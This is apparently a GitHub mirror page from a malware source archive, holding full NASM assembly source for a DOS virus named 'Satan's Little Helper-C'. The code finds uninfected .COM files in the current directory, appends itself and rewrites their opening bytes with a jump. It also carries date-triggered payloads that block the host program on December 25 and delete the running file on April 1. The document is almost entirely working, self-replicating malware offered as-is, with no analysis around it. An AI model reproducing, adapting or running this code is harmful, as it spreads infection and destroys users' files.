mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
354 lines
5.2 KiB
NASM
354 lines
5.2 KiB
NASM
|
; Virus
|
||
|
; Satan's Little Helper-C
|
||
|
;This version:
|
||
|
;Searches current directory for non-infected com files, if any found
|
||
|
;it will become infected!
|
||
|
;This virus has a routine which self-destructs itself and uninfects
|
||
|
;the file.
|
||
|
assume cs:code
|
||
|
.286
|
||
|
code segment "code"
|
||
|
org 0100h
|
||
|
start proc
|
||
|
jmp v_start ;first 5 bytes |
|
||
|
nop ; |
|
||
|
nop ; |
|
||
|
v_start:
|
||
|
call $+3 ;Actual virus
|
||
|
pop dx
|
||
|
sub dx, 3
|
||
|
push dx ;save relocation factor in BP
|
||
|
pop bp ;so virus can be copied anywhere twoards
|
||
|
mov si, dx ;the end of the file
|
||
|
;
|
||
|
; Replace first 5 bytes in memory with original
|
||
|
; program code so normal program can run later
|
||
|
add si, first_five
|
||
|
mov di, 0100h
|
||
|
mov cx, 5
|
||
|
lodsb
|
||
|
stosb
|
||
|
loop $-2
|
||
|
;see if user want to disinfect this file
|
||
|
mov si, 82h
|
||
|
lodsb
|
||
|
cmp al, "[" ;is al the code to disinfect? "["
|
||
|
jne ok_dont_disinfect
|
||
|
jmp self_kill
|
||
|
ok_dont_disinfect:
|
||
|
;here should be date checks to see
|
||
|
;if an evil function should be unleashed!!
|
||
|
mov ah, 2ah
|
||
|
int 21h
|
||
|
;cx year 1980-2099
|
||
|
;dh month 1-12
|
||
|
;dl day
|
||
|
;al day of week 0=sun 1=mon -> 7=sat
|
||
|
cmp dh, 12
|
||
|
jne notdec
|
||
|
cmp dl, 25
|
||
|
jne notdec
|
||
|
jmp christmas
|
||
|
notdec:
|
||
|
cmp dh, 4
|
||
|
jne notapril
|
||
|
cmp dl, 1
|
||
|
jne notapril
|
||
|
jmp aprilfools
|
||
|
notapril:
|
||
|
|
||
|
;Set the DTA
|
||
|
call set_dta
|
||
|
;find first file to ?infect?
|
||
|
call find_first_file
|
||
|
go_again:
|
||
|
mov si, bp
|
||
|
add si, size_
|
||
|
lodsw
|
||
|
cmp ax, 5
|
||
|
ja gd4
|
||
|
jmp resrch
|
||
|
gd4:
|
||
|
call open_file
|
||
|
mov bx, ax
|
||
|
mov al, 0
|
||
|
call date_time
|
||
|
mov ah, 3fh
|
||
|
mov cx, 5
|
||
|
mov dx, bp
|
||
|
add dx, first_five
|
||
|
int 21h
|
||
|
mov ax, 4202h
|
||
|
mov cx, 0
|
||
|
mov dx, cx
|
||
|
int 21h
|
||
|
sub ax, 3
|
||
|
mov si, bp
|
||
|
add si, new_5
|
||
|
mov [si+1], ax
|
||
|
mov si, bp
|
||
|
mov di, si
|
||
|
add si, chkmark
|
||
|
add di, mark
|
||
|
mov cx, 2
|
||
|
repe cmpsb
|
||
|
jne INFECT
|
||
|
;File found was previously infected!
|
||
|
; search for new one now.
|
||
|
jmp resrch
|
||
|
|
||
|
wipe_name:
|
||
|
push di
|
||
|
push ax
|
||
|
push cx
|
||
|
mov di, bp
|
||
|
add di, name_
|
||
|
mov cx, 13
|
||
|
mov al, 0
|
||
|
rep stosb
|
||
|
pop cx
|
||
|
pop ax
|
||
|
pop di
|
||
|
ret
|
||
|
resrch:
|
||
|
call wipe_name
|
||
|
mov ah, 4fh
|
||
|
int 21h
|
||
|
jnc gd3
|
||
|
jmp term_virus
|
||
|
gd3:
|
||
|
jmp go_again
|
||
|
INFECT:
|
||
|
;Time to infect the file!!
|
||
|
mov si, bp
|
||
|
add si, handle
|
||
|
mov bx, [si]
|
||
|
mov cx, vsize
|
||
|
mov dx, bp
|
||
|
call wipe_name
|
||
|
mov ax, 4000h
|
||
|
int 21h
|
||
|
mov ax, 4200h
|
||
|
mov cx, 0
|
||
|
mov dx, cx
|
||
|
int 21h
|
||
|
mov dx, bp
|
||
|
add dx, new_5
|
||
|
mov ax, 4000h
|
||
|
mov cx, 5
|
||
|
int 21h
|
||
|
mov al, 1
|
||
|
call date_time
|
||
|
mov ax, 3e00h
|
||
|
int 21h
|
||
|
jmp resrch
|
||
|
|
||
|
fndnam proc
|
||
|
mov si, env
|
||
|
mov ax, [si]
|
||
|
mov es, ax
|
||
|
mov ds, ax
|
||
|
mov si, 0
|
||
|
mov di, si
|
||
|
__lp:
|
||
|
lodsb
|
||
|
cmp al, 0
|
||
|
je chknxt
|
||
|
stosb
|
||
|
jmp __lp
|
||
|
chknxt:
|
||
|
stosb
|
||
|
lodsb
|
||
|
cmp al, 0
|
||
|
je fnd1
|
||
|
stosb
|
||
|
jmp __lp
|
||
|
fnd1:
|
||
|
stosb
|
||
|
__lp2:
|
||
|
lodsb
|
||
|
cmp al, "a"
|
||
|
jae ff_
|
||
|
up2:
|
||
|
cmp al, "A"
|
||
|
jae fff_
|
||
|
up3:
|
||
|
stosb
|
||
|
jmp __lp2
|
||
|
ff_:
|
||
|
cmp al,"z"
|
||
|
jbe fnd
|
||
|
jmp up2
|
||
|
fff_:
|
||
|
cmp al, "Z"
|
||
|
jbe fnd
|
||
|
jmp up3
|
||
|
fnd:
|
||
|
mov si, di
|
||
|
mov al, 0
|
||
|
repne scasb
|
||
|
mov dx, si
|
||
|
mov di, dx
|
||
|
ret
|
||
|
env equ 2ch
|
||
|
fndnam endp
|
||
|
|
||
|
|
||
|
self_kill:
|
||
|
;this procedure disinfects specified files
|
||
|
;SI points to the name of current file on disk
|
||
|
;which is infected
|
||
|
call fndnam ;find name of current file from env block in memory
|
||
|
jmp gd__
|
||
|
abrt:
|
||
|
int 20h
|
||
|
gd__:
|
||
|
mov ax, 3d02h
|
||
|
int 21h
|
||
|
jc abrt
|
||
|
mov bx, ax
|
||
|
mov ax, cs
|
||
|
mov ds, ax
|
||
|
mov es, ax
|
||
|
mov cx, 5
|
||
|
mov dx, bp
|
||
|
add dx, first_five
|
||
|
call wipe_name
|
||
|
mov ax, 4000h
|
||
|
int 21h
|
||
|
jc abrt
|
||
|
mov dx, 0
|
||
|
mov cx, 0
|
||
|
mov ax, 4202h
|
||
|
int 21h
|
||
|
jnc gd__1
|
||
|
jmp abrt
|
||
|
gd__1:
|
||
|
sub ax, vsize
|
||
|
mov dx, ax
|
||
|
mov cx, 0
|
||
|
mov ax, 4200h
|
||
|
int 21h
|
||
|
call wipe_name
|
||
|
mov cx, 0
|
||
|
mov ax, 4000h
|
||
|
int 21h
|
||
|
mov ax, 3e00h
|
||
|
int 21h
|
||
|
jmp term_virus
|
||
|
date_time:
|
||
|
pusha
|
||
|
mov ah, 57h
|
||
|
cmp al, 0
|
||
|
je fnd__$
|
||
|
mov di, bp
|
||
|
mov si, di
|
||
|
add di, date
|
||
|
add si, time
|
||
|
mov dx, [di]
|
||
|
mov cx, [si]
|
||
|
int 21h
|
||
|
jmp ret__
|
||
|
fnd__$:
|
||
|
int 21h
|
||
|
mov si, bp
|
||
|
mov di, bp
|
||
|
add si, time
|
||
|
add di, date
|
||
|
mov [si], cx
|
||
|
mov [di], dx
|
||
|
ret__:
|
||
|
popa
|
||
|
ret
|
||
|
open_file:
|
||
|
mov dx, bp
|
||
|
add dx, name_
|
||
|
mov ax, 3d02h
|
||
|
int 21h
|
||
|
jnc gd2
|
||
|
jmp term_virus
|
||
|
gd2:
|
||
|
mov si, bp
|
||
|
add si, handle
|
||
|
mov [si], ax
|
||
|
ret
|
||
|
find_first_file:
|
||
|
mov dx, bp
|
||
|
mov cx, 0
|
||
|
mov ah, 4eh
|
||
|
add dx, all_com_files
|
||
|
int 21h
|
||
|
jnc gd1
|
||
|
jmp term_virus
|
||
|
gd1:
|
||
|
ret
|
||
|
set_dta:
|
||
|
mov dx, bp
|
||
|
mov ah, 1ah
|
||
|
add dx, dta
|
||
|
int 21h
|
||
|
ret
|
||
|
term_virus:
|
||
|
mov ax, 0
|
||
|
mov bx, ax
|
||
|
mov cx, bx
|
||
|
mov dx, cx
|
||
|
mov si, 0100h
|
||
|
mov di, -1
|
||
|
mov bp, di
|
||
|
push 0100h
|
||
|
ret
|
||
|
|
||
|
CHRISTMAS:
|
||
|
;Program Lockup
|
||
|
; Exit without running program
|
||
|
int 20h
|
||
|
APRILFOOLS:
|
||
|
;Ha Ha delete current file
|
||
|
call fndnam
|
||
|
mov ah, 41h
|
||
|
int 21h
|
||
|
mov ax, cs
|
||
|
mov ds, ax
|
||
|
mov es, ax
|
||
|
jmp term_virus
|
||
|
; Data Bank
|
||
|
_fstfive:
|
||
|
int 20h
|
||
|
nop
|
||
|
ckmrk:
|
||
|
nop
|
||
|
nop
|
||
|
acf db "*.COM",0
|
||
|
dt_ dw 0
|
||
|
tme dw 0
|
||
|
d_t_a:
|
||
|
rfd db 21 dup (0)
|
||
|
att db 0
|
||
|
dw 0
|
||
|
dw 0
|
||
|
sz dd 0
|
||
|
n_me db 13 dup (0),0
|
||
|
handl dw 0
|
||
|
nw_5 db 0e9h,0,0
|
||
|
mrk db "66"
|
||
|
strain db "C"
|
||
|
;
|
||
|
end___:
|
||
|
first_five = offset _fstfive-0105h
|
||
|
all_com_files = offset acf-0105h
|
||
|
dta = offset d_t_a-0105h
|
||
|
attribute = offset att-0105h
|
||
|
time = offset tme-0105h
|
||
|
date = offset dt_-0105h
|
||
|
size_ = offset sz-0105h
|
||
|
name_ = offset n_me-0105h
|
||
|
handle = offset handl-0105h
|
||
|
new_5 = offset nw_5-0105h
|
||
|
mark = offset mrk-0105h
|
||
|
chkmark = offset ckmrk-0105h
|
||
|
vsize = offset end___-0105h
|
||
|
start endp
|
||
|
code ends
|
||
|
end start
|
||
|
|